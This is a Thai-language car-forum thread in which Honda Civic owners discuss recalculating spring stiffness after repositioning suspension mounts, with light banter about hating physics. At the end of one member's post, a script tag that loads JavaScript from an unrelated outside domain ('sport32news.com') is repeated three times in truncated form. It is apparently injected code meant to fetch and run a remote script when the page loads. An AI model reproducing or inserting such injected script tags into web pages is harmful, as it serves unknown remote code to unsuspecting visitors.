เมื่อมีการเลื่อนเบ้า ระยะสปริงจะยาวขึ้น ก็ต้องมีการคำนวณค่า k ใหม่


ผมแนบวิธีคำนวณหาค่า k มาให้ด้วยเผื่อใครจะงง

http://www.atom.rmutphysics.com/charud/virtualexperiment/virtual3/spring/index.html
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  phasit  Ton- 
thehunter


เข้าร่วม: 01 มิถุนา 2014
ตอบ: 42

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 45
ให้คำขอบคุณ: 11

ที่อยู่: ชลบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 16:05 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
รู้สึกเหมือนกลับไปเรียนวิชาฟิสิกส์อีกครั้งชอบๆ
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 16:11 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
thehunter พิมพ์ว่า:
รู้สึกเหมือนกลับไปเรียนวิชาฟิสิกส์อีกครั้งชอบๆ




ผมโคตรเกลียดฟิสิกส์เลย เจอไป 2 ตัวแทบรากเลือด นึกถึงแล้วยังขยะแขยง แคล 3 ตัวยังง่ายกว่าเย๊อะะะะะะะะะะะะะะะ 


<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
thehunter


เข้าร่วม: 01 มิถุนา 2014
ตอบ: 42

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 45
ให้คำขอบคุณ: 11

ที่อยู่: ชลบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 16:20 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ถกประเด็นกันได้สนุกมากอ่านแล้วได้ความรู้ไม่เครียดเลยชอบมากต่างจากกระทู้อื่นที่ถกกันนอกประเด็นเอาแต่ความรู้สึกส่วนตัวมาพูดกันอ่านแล้วเครียดขอบคุณท่านเจ้าของกระทู้มากครับอ่านแล้วรู้สึกว่าอยากหยิบฟิสิกส์มานั่งคำนวณเลยครับชอบครับกระทู้ดีได้ความรู้มีสาระครับ
ได้รับคำขอบคุณจาก: athongchum  Ton- 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 10 สิงหา 2014 16:21 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
กระทู้นี้คงไม่ยาว ถ้าวันนั้นไอสไตร์ไปนอนใต้ต้นทุเรียน
ได้รับคำขอบคุณจาก: athongchum 
lordpark


ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

ที่อยู่: สายไหม นวลจันทร์ เสรีไทย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 10 สิงหา 2014 21:27 - แชร์แนวทาง แก้ปัญหา หน้านุ่มเกิน ท้ายเด้งไป ตูดห้อยจัง สำหรับคนกลัวเตี้ยแต่ไม่อยากสูง
ยิ่งอ่านนิ่งปวดหัว 
ได้รับคำขอบคุณจาก: athongchum 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.